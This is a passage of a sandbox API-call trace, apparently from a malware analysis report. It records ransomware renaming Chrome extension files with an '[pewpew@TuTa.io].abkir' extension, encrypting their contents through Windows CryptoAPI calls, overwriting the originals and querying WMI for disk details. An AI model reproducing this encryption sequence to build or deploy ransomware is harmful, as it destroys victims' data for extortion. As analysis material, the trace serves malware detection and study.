nFileSizeLow=0x20)) returned 1 [0204.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9a4) returned 1 [0204.562] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0204.563] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html", nBufferLength=0x105, lpBuffer=0x949e560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html", lpFilePart=0x0) returned 0x87 [0204.563] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e568, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\info-decrypt.hta", lpFilePart=0x0) returned 0x8e [0204.563] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9c8) returned 1 [0204.563] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949ea44 | out: lpFileInformation=0x949ea44*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x31f86dc0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x31f86dc0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x31f86dc0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0204.564] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9c4) returned 1 [0204.564] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html", nBufferLength=0x105, lpBuffer=0x949e568, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html", lpFilePart=0x0) returned 0x87 [0204.564] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea14) returned 1 [0204.564] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html"), fInfoLevelId=0x0, lpFileInformation=0x3611d98 | out: lpFileInformation=0x3611d98*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b74730, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xe4180700, ftLastWriteTime.dwHighDateTime=0x1d03f5e, nFileSizeHigh=0x0, nFileSizeLow=0x5c)) returned 1 [0204.784] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea10) returned 1 [0204.784] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html", nBufferLength=0x105, lpBuffer=0x949e454, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html", lpFilePart=0x0) returned 0x87 [0204.784] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e948) returned 1 [0204.785] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a8 [0204.785] GetFileType (hFile=0x4a8) returned 0x1 [0204.785] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e944) returned 1 [0204.785] GetFileType (hFile=0x4a8) returned 0x1 [0204.785] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x949ea50 | out: lpFileSizeHigh=0x949ea50*=0x0) returned 0x5c [0204.785] ReadFile (in: hFile=0x4a8, lpBuffer=0x3612108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x949e9fc, lpOverlapped=0x0 | out: lpBuffer=0x3612108*, lpNumberOfBytesRead=0x949e9fc*=0x5c, lpOverlapped=0x0) returned 1 [0204.786] CloseHandle (hObject=0x4a8) returned 1 [0204.787] CryptAcquireContextW (in: phProv=0x949e99c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x949e99c*=0xbdf480) returned 1 [0204.788] CryptGenRandom (in: hProv=0xbdf480, dwLen=0x10, pbBuffer=0x3713484 | out: pbBuffer=0x3713484) returned 1 [0205.000] CryptImportKey (in: hProv=0xbdf480, pbData=0x36206f0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x949e96c | out: phKey=0x949e96c*=0xb7fa50) returned 1 [0205.001] CryptContextAddRef (hProv=0xbdf480, pdwReserved=0x0, dwFlags=0x0) returned 1 [0205.001] CryptContextAddRef (hProv=0xbdf480, pdwReserved=0x0, dwFlags=0x0) returned 1 [0205.001] CryptDuplicateKey (in: hKey=0xb7fa50, pdwReserved=0x0, dwFlags=0x0, phKey=0x949e95c | out: phKey=0x949e95c*=0xb7f310) returned 1 [0205.001] CryptContextAddRef (hProv=0xbdf480, pdwReserved=0x0, dwFlags=0x0) returned 1 [0205.001] CryptSetKeyParam (hKey=0xb7f310, dwParam=0x4, pbData=0x36207d0*=0x1, dwFlags=0x0) returned 1 [0205.001] CryptSetKeyParam (hKey=0xb7f310, dwParam=0x1, pbData=0x362079c, dwFlags=0x0) returned 1 [0205.001] CryptEncrypt (in: hKey=0xb7f310, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x36207e0*, pdwDataLen=0x949e9c8*=0x60, dwBufLen=0x60 | out: pbData=0x36207e0*, pdwDataLen=0x949e9c8*=0x60) returned 1 [0205.001] CryptEncrypt (in: hKey=0xb7f310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3620864*, pdwDataLen=0x949e9d0*=0x0, dwBufLen=0x10 | out: pbData=0x3620864*, pdwDataLen=0x949e9d0*=0x10) returned 1 [0205.034] CryptDestroyKey (hKey=0xb7fa50) returned 1 [0205.034] CryptReleaseContext (hProv=0xbdf480, dwFlags=0x0) returned 1 [0205.034] CryptReleaseContext (hProv=0xbdf480, dwFlags=0x0) returned 1 [0205.034] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html", nBufferLength=0x105, lpBuffer=0x949e440, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html", lpFilePart=0x0) returned 0x87 [0205.035] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e934) returned 1 [0205.035] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x32c [0205.036] GetFileType (hFile=0x32c) returned 0x1 [0205.036] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e930) returned 1 [0205.036] GetFileType (hFile=0x32c) returned 0x1 [0205.036] WriteFile (in: hFile=0x32c, lpBuffer=0x3634360*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x949e9c4, lpOverlapped=0x0 | out: lpBuffer=0x3634360*, lpNumberOfBytesWritten=0x949e9c4*=0x20, lpOverlapped=0x0) returned 1 [0205.037] CloseHandle (hObject=0x32c) returned 1 [0205.037] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0205.038] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0205.038] CoTaskMemFree (pv=0xbed438) [0205.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x949e428, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0205.038] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e970 | out: ppv=0x949e970*=0xb51e34) returned 0x0 [0205.038] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e968 | out: pAptType=0x949e968*=1) returned 0x0 [0205.038] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e96c | out: ppvObject=0x949e96c*=0x0) returned 0x80004002 [0205.038] IUnknown:Release (This=0xb51e34) returned 0x1 [0205.039] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e2d8 | out: ppv=0x949e2d8*=0x6027270) returned 0x0 [0205.039] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027270, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e4f0 | out: ppvObject=0x949e4f0*=0x0) returned 0x80004002 [0205.039] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027270, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e504 | out: ppvObject=0x949e504*=0x6030860) returned 0x0 [0205.039] WbemDefPath:IUnknown:Release (This=0x6027270) returned 0x0 [0205.039] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e124 | out: ppvObject=0x949e124*=0x6030860) returned 0x0 [0205.039] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e0e0 | out: ppvObject=0x949e0e0*=0x0) returned 0x80004002 [0205.040] WbemDefPath:IUnknown:AddRef (This=0x6030860) returned 0x3 [0205.040] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949da3c | out: ppvObject=0x949da3c*=0x0) returned 0x80004002 [0205.040] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d9ec | out: ppvObject=0x949d9ec*=0x0) returned 0x80004002 [0205.040] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d9f8 | out: ppvObject=0x949d9f8*=0x66ce3d8) returned 0x0 [0205.040] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce3d8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949da00 | out: pCid=0x949da00*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0205.040] WbemDefPath:IUnknown:Release (This=0x66ce3d8) returned 0x3 [0205.040] CoGetContextToken (in: pToken=0x949da58 | out: pToken=0x949da58) returned 0x0 [0205.040] CoGetContextToken (in: pToken=0x949de60 | out: pToken=0x949de60) returned 0x0 [0205.040] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949def0 | out: ppvObject=0x949def0*=0x0) returned 0x80004002 [0205.040] WbemDefPath:IUnknown:Release (This=0x6030860) returned 0x2 [0205.040] WbemDefPath:IUnknown:Release (This=0x6030860) returned 0x1 [0205.040] CoGetContextToken (in: pToken=0x949e7e8 | out: pToken=0x949e7e8) returned 0x0 [0205.040] CoGetContextToken (in: pToken=0x949e748 | out: pToken=0x949e748) returned 0x0 [0205.040] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x949e818*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e814 | out: ppvObject=0x949e814*=0x6030860) returned 0x0 [0205.040] WbemDefPath:IUnknown:AddRef (This=0x6030860) returned 0x3 [0205.040] WbemDefPath:IUnknown:Release (This=0x6030860) returned 0x2 [0205.040] WbemDefPath:IWbemPath:SetText (This=0x6030860, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0205.040] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030860, puCount=0x949e99c | out: puCount=0x949e99c*=0x0) returned 0x0 [0205.040] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=2, puBuffLength=0x949e998*=0x0, pszText=0x0 | out: puBuffLength=0x949e998*=0x20, pszText=0x0) returned 0x0 [0205.040] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=2, puBuffLength=0x949e998*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e998*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0205.041] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030860, uRequestedInfo=0x0, puResponse=0x949e9a4 | out: puResponse=0x949e9a4*=0xc19) returned 0x0 [0205.041] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030860, puCount=0x949e99c | out: puCount=0x949e99c*=0x0) returned 0x0 [0205.041] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030860, uRequestedInfo=0x0, puResponse=0x949e9a4 | out: puResponse=0x949e9a4*=0xc19) returned 0x0 [0205.041] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030860, uRequestedInfo=0x0, puResponse=0x949e9a4 | out: puResponse=0x949e9a4*=0xc19) returned 0x0 [0205.041] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030860, puCount=0x949e91c | out: puCount=0x949e91c*=0x0) returned 0x0 [0205.041] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x949e908 | out: puCount=0x949e908*=0x2) returned 0x0 [0205.041] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e904*=0x0, pszText=0x0 | out: puBuffLength=0x949e904*=0xf, pszText=0x0) returned 0x0 [0205.041] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e904*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e904*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0205.041] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e8b8 | out: ppv=0x949e8b8*=0xb51e34) returned 0x0 [0205.041] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e8b0 | out: pAptType=0x949e8b0*=1) returned 0x0 [0205.041] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e8b4 | out: ppvObject=0x949e8b4*=0x0) returned 0x80004002 [0205.041] IUnknown:Release (This=0xb51e34) returned 0x1 [0205.042] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e220 | out: ppv=0x949e220*=0x6027250) returned 0x0 [0205.042] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027250, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e438 | out: ppvObject=0x949e438*=0x0) returned 0x80004002 [0205.042] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027250, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e44c | out: ppvObject=0x949e44c*=0x6030a90) returned 0x0 [0205.042] WbemDefPath:IUnknown:Release (This=0x6027250) returned 0x0 [0205.042] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a90, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e06c | out: ppvObject=0x949e06c*=0x6030a90) returned 0x0 [0205.042] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a90, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e028 | out: ppvObject=0x949e028*=0x0) returned 0x80004002 [0205.042] WbemDefPath:IUnknown:AddRef (This=0x6030a90) returned 0x3 [0205.043] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a90, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949d984 | out: ppvObject=0x949d984*=0x0) returned 0x80004002 [0205.043] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a90, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d934 | out: ppvObject=0x949d934*=0x0) returned 0x80004002 [0205.043] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a90, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d940 | out: ppvObject=0x949d940*=0xbe22c0) returned 0x0 [0205.043] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe22c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949d948 | out: pCid=0x949d948*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0205.043] WbemDefPath:IUnknown:Release (This=0xbe22c0) returned 0x3 [0205.043] CoGetContextToken (in: pToken=0x949d9a0 | out: pToken=0x949d9a0) returned 0x0 [0205.043] CoGetContextToken (in: pToken=0x949dda8 | out: pToken=0x949dda8) returned 0x0 [0205.043] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a90, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949de38 | out: ppvObject=0x949de38*=0x0) returned 0x80004002 [0205.043] WbemDefPath:IUnknown:Release (This=0x6030a90) returned 0x2 [0205.043] WbemDefPath:IUnknown:Release (This=0x6030a90) returned 0x1 [0205.043] CoGetContextToken (in: pToken=0x949e730 | out: pToken=0x949e730) returned 0x0 [0205.043] CoGetContextToken (in: pToken=0x949e690 | out: pToken=0x949e690) returned 0x0 [0205.043] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a90, riid=0x949e760*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e75c | out: ppvObject=0x949e75c*=0x6030a90) returned 0x0 [0205.043] WbemDefPath:IUnknown:AddRef (This=0x6030a90) returned 0x3 [0205.043] WbemDefPath:IUnknown:Release (This=0x6030a90) returned 0x2 [0205.043] WbemDefPath:IWbemPath:SetText (This=0x6030a90, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0205.043] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a90, puCount=0x949e8e0 | out: puCount=0x949e8e0*=0x2) returned 0x0 [0205.043] WbemDefPath:IWbemPath:GetText (in: This=0x6030a90, lFlags=4, puBuffLength=0x949e8dc*=0x0, pszText=0x0 | out: puBuffLength=0x949e8dc*=0xf, pszText=0x0) returned 0x0 [0205.043] WbemDefPath:IWbemPath:GetText (in: This=0x6030a90, lFlags=4, puBuffLength=0x949e8dc*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e8dc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0205.043] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e8e0 | out: ppv=0x949e8e0*=0xb51e34) returned 0x0 [0205.044] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e8d8 | out: pAptType=0x949e8d8*=1) returned 0x0 [0205.044] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e8dc | out: ppvObject=0x949e8dc*=0x0) returned 0x80004002 [0205.044] IUnknown:Release (This=0xb51e34) returned 0x1 [0205.044] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e500 | out: ppv=0x949e500*=0x6023bd0) returned 0x0 [0205.044] WbemLocator:IUnknown:QueryInterface (in: This=0x6023bd0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e718 | out: ppvObject=0x949e718*=0x0) returned 0x80004002 [0205.044] WbemLocator:IClassFactory:CreateInstance (in: This=0x6023bd0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 